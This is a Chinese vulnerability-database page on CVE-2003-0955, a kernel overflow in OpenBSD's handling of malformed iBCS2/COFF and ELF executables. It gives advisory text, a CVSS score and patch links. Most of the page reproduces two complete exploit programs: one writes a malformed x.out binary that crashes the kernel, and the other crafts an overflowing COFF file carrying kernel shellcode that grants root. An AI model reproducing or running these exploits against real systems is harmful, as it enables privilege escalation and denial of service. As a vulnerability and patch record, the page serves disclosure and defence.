CVE-2003-0955
CVSS4.6
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:38:28
NMCOES    

[原文]OpenBSD kernel 3.3 and 3.4 allows local users to cause a denial of service (kernel panic) and possibly execute arbitrary code in 3.4 via a program with an invalid header that is not properly handled by (1) ibcs2_exec.c in the iBCS2 emulation (compat_ibcs2) or (2) exec_elf.c, which leads to a stack-based buffer overflow.


[CNNVD]OpenBSD本地畸形二进制程序执行拒绝服务攻击漏洞(CNNVD-200312-031)

        
        OpenBSD是一款开放源代码操作系统。
        OpenBSD在处理部分可执行文件时存在问题,本地攻击者可以利用这个漏洞可能以内核权限执行任意恶意指令。
        漏洞问题是由于执行二进制程序时没有对程序头字段值进行完整性检查,攻击者构建恶意二进制程序并执行,可导致内核崩溃。根据目前调查情况,此漏洞看起来可以以内核上下文执行任意指令。
        问题存在于"ibcs2_exec.c" line 619 of 738 --83%-- col 1-8:
         /* read in segment table */
         xs = (struct xseg *)malloc(xep->xe_segsize, M_TEMP, M_WAITOK);
         error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t)xs,
        从上看来malloc会返回NULL,另一个额外难题是:
        "exec_elf.c" line 792 of 827 --95%-- col 6-20
         np = (Elf_Note *)malloc(ph->p_filesz, M_TEMP, M_WAITOK);
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:openbsd:openbsd:3.4OpenBSD 3.4
cpe:/o:openbsd:openbsd:3.3OpenBSD 3.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0955
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0955
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-031
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
(PATCH)  OPENBSD  20031105 005: RELIABILITY FIX: November 4, 2003
http://lists.grok.org.uk/pipermail/full-disclosure/2003-November/013315.html
(UNKNOWN)  FULLDISC  20031104 OpenBSD kernel overflow, yet still *BSD much better than windows
http://marc.info/?l=openbsd-security-announce&m=106808820119679&w=2
(UNKNOWN)  CONFIRM  http://marc.info/?l=openbsd-security-announce&m=106808820119679&w=2
http://marc.info/?l=openbsd-security-announce&m=106917441524978&w=2
(UNKNOWN)  CONFIRM  http://marc.info/?l=openbsd-security-announce&m=106917441524978&w=2
http://www.guninski.com/msuxobsd2.html
(VENDOR_ADVISORY)  MISC  http://www.guninski.com/msuxobsd2.html
http://www.openbsd.org/errata33.html
(UNKNOWN)  OPENBSD  20031104 010: RELIABILITY FIX: November 4, 2003
http://www.securityfocus.com/bid/8978
(UNKNOWN)  BID  8978

- 漏洞信息

OpenBSD本地畸形二进制程序执行拒绝服务攻击漏洞
中危 边界条件错误
2003-12-15 00:00:00 2005-10-20 00:00:00
本地  
        
        OpenBSD是一款开放源代码操作系统。
        OpenBSD在处理部分可执行文件时存在问题,本地攻击者可以利用这个漏洞可能以内核权限执行任意恶意指令。
        漏洞问题是由于执行二进制程序时没有对程序头字段值进行完整性检查,攻击者构建恶意二进制程序并执行,可导致内核崩溃。根据目前调查情况,此漏洞看起来可以以内核上下文执行任意指令。
        问题存在于"ibcs2_exec.c" line 619 of 738 --83%-- col 1-8:
         /* read in segment table */
         xs = (struct xseg *)malloc(xep->xe_segsize, M_TEMP, M_WAITOK);
         error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t)xs,
        从上看来malloc会返回NULL,另一个额外难题是:
        "exec_elf.c" line 792 of 827 --95%-- col 6-20
         np = (Elf_Note *)malloc(ph->p_filesz, M_TEMP, M_WAITOK);
        

- 公告与补丁

        厂商补丁:
        OpenBSD
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        OpenBSD OpenBSD 3.3:
        OpenBSD Upgrade 010_exec.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/010_exec.patch
        OpenBSD OpenBSD 3.4:
        OpenBSD Upgrade 005_exec.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch

- 漏洞信息 (118)

OpenBSD (ibcs2_exec) Kernel Local Exploit (EDBID:118)
bsd local
2003-11-07 Verified
0 Scott Bartram
N/A [点击下载]
//
// Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
//
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
/* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */
/* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */

/*
 * Copyright (c) 1994, 1995 Scott Bartram
 * All rights reserved.
 *
 * adapted from sys/sys/exec_ecoff.h
 * based on Intel iBCS2
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 * derived from this software without specific prior written permission
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#ifndef _IBCS2_EXEC_H_
#define _IBCS2_EXEC_H_

/*
 * COFF file header
 */

struct coff_filehdr {
    u_short f_magic; /* magic number */
    u_short f_nscns; /* # of sections */
    long f_timdat; /* timestamp */
    long f_symptr; /* file offset of symbol table */
    long f_nsyms; /* # of symbol table entries */
    u_short f_opthdr; /* size of optional header */
    u_short f_flags; /* flags */
};

/* f_magic flags */
#define COFF_MAGIC_I386 0x14c

/* f_flags */
#define COFF_F_RELFLG 0x1
#define COFF_F_EXEC 0x2
#define COFF_F_LNNO 0x4
#define COFF_F_LSYMS 0x8
#define COFF_F_SWABD 0x40
#define COFF_F_AR16WR 0x80
#define COFF_F_AR32WR 0x100

/*
 * COFF system header
 */

struct coff_aouthdr {
    short a_magic;
    short a_vstamp;
    long a_tsize;
    long a_dsize;
    long a_bsize;
    long a_entry;
    long a_tstart;
    long a_dstart;
};

/* magic */
#define COFF_OMAGIC 0407 /* text not write-protected; data seg
is contiguous with text */
#define COFF_NMAGIC 0410 /* text is write-protected; data starts
at next seg following text */
#define COFF_ZMAGIC 0413 /* text and data segs are aligned for
direct paging */
#define COFF_SMAGIC 0443 /* shared lib */

/*
 * COFF section header
 */

struct coff_scnhdr {
    char s_name[8];
    long s_paddr;
    long s_vaddr;
    long s_size;
    long s_scnptr;
    long s_relptr;
    long s_lnnoptr;
    u_short s_nreloc;
    u_short s_nlnno;
    long s_flags;
};

/* s_flags */
#define COFF_STYP_REG 0x00
#define COFF_STYP_DSECT 0x01
#define COFF_STYP_NOLOAD 0x02
#define COFF_STYP_GROUP 0x04
#define COFF_STYP_PAD 0x08
#define COFF_STYP_COPY 0x10
#define COFF_STYP_TEXT 0x20
#define COFF_STYP_DATA 0x40
#define COFF_STYP_BSS 0x80
#define COFF_STYP_INFO 0x200
#define COFF_STYP_OVER 0x400
#define COFF_STYP_SHLIB 0x800

/*
 * COFF shared library header
 */

struct coff_slhdr {
long entry_len; /* in words */
long path_index; /* in words */
char sl_name[1];
};

#define COFF_ROUND(val, by) (((val) + by - 1) & ~(by - 1))

#define COFF_ALIGN(a) ((a) & ~(COFF_LDPGSZ - 1))

#define COFF_HDR_SIZE \
(sizeof(struct coff_filehdr) + sizeof(struct coff_aouthdr))

#define COFF_BLOCK_ALIGN(ap, value) \
        (ap->a_magic == COFF_ZMAGIC ? COFF_ROUND(value, COFF_LDPGSZ) : \
         value)

#define COFF_TXTOFF(fp, ap) \
        (ap->a_magic == COFF_ZMAGIC ? 0 : \
         COFF_ROUND(COFF_HDR_SIZE + fp->f_nscns * \
sizeof(struct coff_scnhdr), COFF_SEGMENT_ALIGNMENT(ap)))

#define COFF_DATOFF(fp, ap) \
        (COFF_BLOCK_ALIGN(ap, COFF_TXTOFF(fp, ap) + ap->a_tsize))

#define COFF_SEGMENT_ALIGN(ap, value) \
        (COFF_ROUND(value, (ap->a_magic == COFF_ZMAGIC ? COFF_LDPGSZ : \
         COFF_SEGMENT_ALIGNMENT(ap))))

#define COFF_LDPGSZ 4096

#define COFF_SEGMENT_ALIGNMENT(ap) 4

#define COFF_BADMAG(ex) (ex->f_magic != COFF_MAGIC_I386)

#define IBCS2_HIGH_SYSCALL(n) (((n) & 0x7f) == 0x28)
#define IBCS2_CVT_HIGH_SYSCALL(n) (((n) >> 8) + 128)

struct exec_package;
int exec_ibcs2_coff_makecmds(struct proc *, struct exec_package *);

/*
 * x.out (XENIX)
 */

struct xexec {
u_short x_magic; /* magic number */
u_short x_ext; /* size of extended header */
long x_text; /* ignored */
long x_data; /* ignored */
long x_bss; /* ignored */
long x_syms; /* ignored */
long x_reloc; /* ignored */
long x_entry; /* executable entry point */
char x_cpu; /* processor type */
char x_relsym; /* ignored */
u_short x_renv; /* flags */
};

/* x_magic flags */
#define XOUT_MAGIC 0x0206

/* x_cpu flags */
#define XC_386 0x004a /* 386, word-swapped */

/* x_renv flags */
#define XE_V5 0xc000
#define XE_SEG 0x0800
#define XE_ABS 0x0400
#define XE_ITER 0x0200
#define XE_VMOD 0x0100
#define XE_FPH 0x0080
#define XE_LTEXT 0x0040
#define XE_LDATA 0x0020
#define XE_OVER 0x0010
#define XE_FS 0x0008
#define XE_PURE 0x0004
#define XE_SEP 0x0002
#define XE_EXEC 0x0001

/*
 * x.out extended header
 */

struct xext {
long xe_trsize; /* ignored */
long xe_drsize; /* ignored */
long xe_tbase; /* ignored */
long xe_dbase; /* ignored */
long xe_stksize; /* stack size if XE_FS set in x_renv */
long xe_segpos; /* offset of segment table */
long xe_segsize; /* segment table size */
long xe_mdtpos; /* ignored */
long xe_mdtsize; /* ignored */
char xe_mdttype; /* ignored */
char xe_pagesize; /* ignored */
char xe_ostype; /* ignored */
char xe_osvers; /* ignored */
u_short xe_eseg; /* ignored */
u_short xe_sres; /* ignored */
};

/*
 * x.out segment table
 */

struct xseg {
u_short xs_type; /* segment type */
u_short xs_attr; /* attribute flags */
u_short xs_seg; /* segment selector number */
char xs_align; /* ignored */
char xs_cres; /* ignored */
long xs_filpos; /* offset of this segment */
long xs_psize; /* physical segment size */
long xs_vsize; /* virtual segment size */
long xs_rbase; /* relocation base address */
u_short xs_noff; /* ignored */
u_short xs_sres; /* ignored */
long xs_lres; /* ignored */
};

/* xs_type flags */
#define XS_TNULL 0 /* unused */
#define XS_TTEXT 1 /* text (read-only) */
#define XS_TDATA 2 /* data (read-write) */
#define XS_TSYMS 3 /* symbol table (noload) */
#define XS_TREL 4 /* relocation segment (noload) */
#define XS_TSESTR 5 /* string table (noload) */
#define XS_TGRPS 6 /* group segment (noload) */

#define XS_TIDATA 64
#define XS_TTSS 65
#define XS_TLFIX 66
#define XS_TDNAME 67
#define XS_TDTEXT 68
#define XS_TDFIX 69
#define XS_TOVTAB 70
#define XS_T71 71
#define XS_TSYSTR 72

/* xs_attr flags */
#define XS_AMEM 0x8000 /* memory image */
#define XS_AITER 0x0001 /* iteration records */
#define XS_AHUGE 0x0002 /* unused */
#define XS_ABSS 0x0004 /* uninitialized data */
#define XS_APURE 0x0008 /* read-only (sharable) segment */
#define XS_AEDOWN 0x0010 /* expand down memory segment */
#define XS_APRIV 0x0020 /* unused */
#define XS_A32BIT 0x0040 /* 32-bit text/data */

/*
 * x.out iteration record
 */

struct xiter {
long xi_size; /* text/data size */
long xi_rep; /* number of replications */
long xi_offset; /* offset within segment to replicated data */
};

#define XOUT_HDR_SIZE (sizeof(struct xexec) + sizeof(struct xext))

int exec_ibcs2_xout_makecmds(struct proc *, struct exec_package *);

#endif /* !_IBCS2_EXEC_H_ */

int main(int ac,char **av)
{
int fd;
struct xexec xp;
struct xext xep;
char exe[10];
char fil[]="./vvc";

fd=open(fil,O_CREAT|O_RDWR,0700);
if (fd==-1) {perror("open");return 1;}
memset(&xp,0,sizeof(xp));
memset(&xep,0,sizeof(xep));
memset(exe,'v',sizeof(exe));
xp.x_magic = XOUT_MAGIC;
xp.x_cpu = XC_386;
xp.x_renv = XE_EXEC;
xp.x_ext = sizeof(xep);
xep.xe_segsize = -1;
write(fd,&xp,sizeof(xp));
write(fd,&xep,sizeof(xep));
write(fd,exe,sizeof(exe));
printf("Now exec %s\n",fil);

}

// milw0rm.com [2003-11-07]
		

- 漏洞信息 (125)

OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit (EDBID:125)
bsd local
2003-11-19 Verified
0 Sinan Eren
N/A [点击下载]
/** OpenBSD 2.x - 3.3                                                              **/				 
/** exec_ibcs2_coff_prep_zmagic() kernel stack overflow	              **/ 
/** note: ibcs2 binary compatibility with SCO and ISC is enabled    **/
/** in the default install                                                            **/   
/** 	Copyright Feb 26 2003 Sinan "noir" Eren 	              **/ 
/**	noir olympos org | noir uberhax0r net	            **/ 
/**	greets to brother nahual for making this usefull!          **/ 

#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/signal.h>

//#include "ibcs2_exec.h"

/* kernel_sc.s shellcode */
/* much improved the opcode search, fixed the stupid logic bug! */

unsigned char shellcode[] =
"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
"\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
"\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
"\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
"\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
"\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0"
"\x75\xef\x47\x31\xc0\x57\xc3";

/* do not use! */
/* 
silvio gotta get his brain together and understand why sometimes
you need to return to kernel code rather than setting the selectors
pushing ss,esp,eflag,cs,eip and do an iret! 

well, aloha?? vnode locks being held ? mutex locks being held ? 
you have to return to the kernel code that unlocks the syncronization
objects

*/

unsigned char iret_shellcode[] =
"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
"\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00"
"\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a"
"\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00"
"\x6a\x17";

unsigned char pusheip[] =
"\x68\x00\x00\x00\x00"; /* fill eip */

unsigned char iret[] =
"\xcf";

unsigned char exitsh[] =
"\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */


#define ZERO(p) memset(&p, 0x00, sizeof(p))

/*
 * COFF file header
 */

struct coff_filehdr {
    u_short     f_magic;        /* magic number */
    u_short     f_nscns;        /* # of sections */
    long        f_timdat;       /* timestamp */
    long        f_symptr;       /* file offset of symbol table */
    long        f_nsyms;        /* # of symbol table entries */
    u_short     f_opthdr;       /* size of optional header */
    u_short     f_flags;        /* flags */
};

/* f_magic flags */
#define COFF_MAGIC_I386 0x14c

/* f_flags */
#define COFF_F_RELFLG   0x1
#define COFF_F_EXEC     0x2
#define COFF_F_LNNO     0x4
#define COFF_F_LSYMS    0x8
#define COFF_F_SWABD    0x40
#define COFF_F_AR16WR   0x80
#define COFF_F_AR32WR   0x100

/*
 * COFF system header
 */

struct coff_aouthdr {
    short       a_magic;
    short       a_vstamp;
    long        a_tsize;
    long        a_dsize;
    long        a_bsize;
    long        a_entry;
    long        a_tstart;
    long        a_dstart;
};

/* magic */
#define COFF_ZMAGIC     0413

/*
 * COFF section header
 */

struct coff_scnhdr {
    char        s_name[8];
    long        s_paddr;
    long        s_vaddr;
    long        s_size;
    long        s_scnptr;
    long        s_relptr;
    long        s_lnnoptr;
    u_short     s_nreloc;
    u_short     s_nlnno;
    long        s_flags;
};

/* s_flags */
#define COFF_STYP_TEXT          0x20
#define COFF_STYP_DATA          0x40
#define COFF_STYP_SHLIB         0x800


void get_proc(pid_t, struct kinfo_proc *);
void sig_handler();

int
main(int argc, char **argv)
{
  u_int i, fd, debug = 0;
  u_char *ptr, *shptr;
  u_long *lptr;
  u_long pprocadr, offset;
  struct kinfo_proc kp;
  char *args[] = { "./ibcs2own", NULL};
  char *envs[] = { "RIP=theo", NULL};
  //COFF structures
  struct coff_filehdr fhdr;
  struct coff_aouthdr ahdr;
  struct coff_scnhdr  scn0, scn1, scn2;

   if(argv[1]) {
      if(!strncmp(argv[1], "-v", 2)) 
              debug = 1;
      else { 
	      printf("-v: verbose flag only\n");
	      exit(0);
            }
    }
 
    ZERO(fhdr);
    fhdr.f_magic = COFF_MAGIC_I386;
    fhdr.f_nscns = 3; //TEXT, DATA, SHLIB
    fhdr.f_timdat = 0xdeadbeef;
    fhdr.f_symptr = 0x4000;
    fhdr.f_nsyms = 1;
    fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size
    fhdr.f_flags = COFF_F_EXEC;

    ZERO(ahdr);
    ahdr.a_magic = COFF_ZMAGIC;
    ahdr.a_tsize = 0;
    ahdr.a_dsize = 0; 
    ahdr.a_bsize = 0;
    ahdr.a_entry = 0x10000;
    ahdr.a_tstart = 0;
    ahdr.a_dstart = 0;
   
    ZERO(scn0);
    memcpy(&scn0.s_name, ".text", 5);
    scn0.s_paddr = 0x10000;
    scn0.s_vaddr = 0x10000;
    scn0.s_size = 4096;
    scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); 
    //file offset of .text segment
    scn0.s_relptr = 0;
    scn0.s_lnnoptr = 0;
    scn0.s_nreloc = 0;
    scn0.s_nlnno = 0;
    scn0.s_flags = COFF_STYP_TEXT;

    ZERO(scn1);
    memcpy(&scn1.s_name, ".data", 5);
    scn1.s_paddr = 0x10000 - 4096;
    scn1.s_vaddr = 0x10000 - 4096;
    scn1.s_size = 4096;
    scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; 
    //file offset of .data segment
    scn1.s_relptr = 0;
    scn1.s_lnnoptr = 0;
    scn1.s_nreloc = 0;
    scn1.s_nlnno = 0;
    scn1.s_flags = COFF_STYP_DATA;

    ZERO(scn2);
    memcpy(&scn2.s_name, ".shlib", 6);
    scn2.s_paddr = 0;
    scn2.s_vaddr = 0;
    scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128
    scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; 
    //file offset of .data segment
    scn2.s_relptr = 0;
    scn2.s_lnnoptr = 0;
    scn2.s_nreloc = 0;
    scn2.s_nlnno = 0;
    scn2.s_flags = COFF_STYP_SHLIB;

    offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096;
    ptr = (char *) malloc(offset);
    if(!ptr) { 
		perror("malloc");
		exit(-1);
    }

    memset(ptr, 0xcc, offset);  /* fill int3 */

    /* copy sections */
    offset = 0;
    memcpy(ptr, (char *) &fhdr, sizeof(fhdr));
    offset += sizeof(fhdr);

    memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); 
    offset += sizeof(ahdr);
	
    memcpy(ptr+offset, (char *) &scn0, sizeof(scn0));
    offset += sizeof(scn0);

    memcpy(ptr+offset, &scn1, sizeof(scn1));
    offset += sizeof(scn1);

    memcpy(ptr+offset, (char *) &scn2, sizeof(scn2));
    offset += sizeof(scn2);

    lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \
           (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8);

    shptr = (char *) malloc(4096);
    if(!shptr) {
		perror("malloc");
		exit(-1);
    }
    if(debug)
      printf("payload adr: 0x%.8x\t", shptr);

    memset(shptr, 0xcc, 4096);

    get_proc((pid_t) getppid(), &kp);
    pprocadr = (u_long) kp.kp_eproc.e_paddr;
    if(debug)
      printf("parent proc adr: 0x%.8x\n", pprocadr); 

    *lptr++ = 0xdeadbeef;
    *lptr = (u_long) shptr;

    shellcode[5] = pprocadr & 0xff;
    shellcode[6] = (pprocadr >> 8) & 0xff;
    shellcode[7] = (pprocadr >> 16) & 0xff;
    shellcode[8] = (pprocadr >> 24) & 0xff;

    memcpy(shptr, shellcode, sizeof(shellcode)-1);

    unlink("./ibcs2own");
    if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) {
		perror("open");
		exit(-1);
	}

    write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096 + 4096
+ 4096);
    close(fd);
    free(ptr);

    signal(SIGSEGV, (void (*)())sig_handler);
    signal(SIGILL, (void (*)())sig_handler);
    signal(SIGSYS, (void (*)())sig_handler);
    signal(SIGBUS, (void (*)())sig_handler);
    signal(SIGABRT, (void (*)())sig_handler);
    signal(SIGTRAP, (void (*)())sig_handler);

    printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n");
    execve(args[0], args, envs);
    perror("execve");
}

void
sig_handler()
{
   _exit(0);
}

void
get_proc(pid_t pid, struct kinfo_proc *kp)
{
   u_int arr[4], len;

        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
                perror("sysctl");
                fprintf(stderr, "this is an unexpected error, rerun!\n");
                exit(-1);
        }

}

// milw0rm.com [2003-11-19]
		

- 漏洞信息

2832
OpenBSD compat_ibcs2 Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

OpenBSD contains a flaw that may allow a malicious user to gain access to unauthorized privileges or cause a Denial of Service. The issue is caused by a boundary error in compat_ibcs2. This flaw may lead to a loss of Confidentiality, Integrity and/or Availability.

- 时间线

2003-11-18 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, OpenBSD has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

OpenBSD IBCS2 Binary Length Parameter Kernel-Based Buffer Overrun Vulnerability
Boundary Condition Error 9061
No Yes
2003-11-17 12:00:00 2009-07-12 12:56:00
This vulnerability was discovered by Georgi Guninski. This vulnerability was also independently discovered by noir.

- 受影响的程序版本

OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 2.0
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0

- 漏洞讨论

A buffer overrun has been discovered within the OpenBSD kernel when handling malformed COFF executables. The problem occurs when the kernel is carrying out a read operation on the binary file, incorrectly using the length parameter within the COFF header structure without first carryout out sanity checking. As a result, a malformed binary may be capable of triggering a stack overrun within the context of kernel memory. This vulnerability could potentially be exploited to gain elevated privileges on OpenBSD 2.x-3.3 systems. It has yet to be confirmed whether this is also possible on OpenBSD 3.4, however it is said to be possible to at least trigger a kernel panic.

- 漏洞利用

The following exploit was provided by noir:

- 解决方案

The vendor has addressed this issue via CVS. The patched source file can be obtained through the following link:

http://www.openbsd.org/cgi-bin/cvsweb/src/sys/compat/ibcs2/ibcs2_exec.c.diff?r1=1.14.6.1&r2=1.14.6.2

Patches have also been made available.


OpenBSD OpenBSD 3.3

OpenBSD OpenBSD 3.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站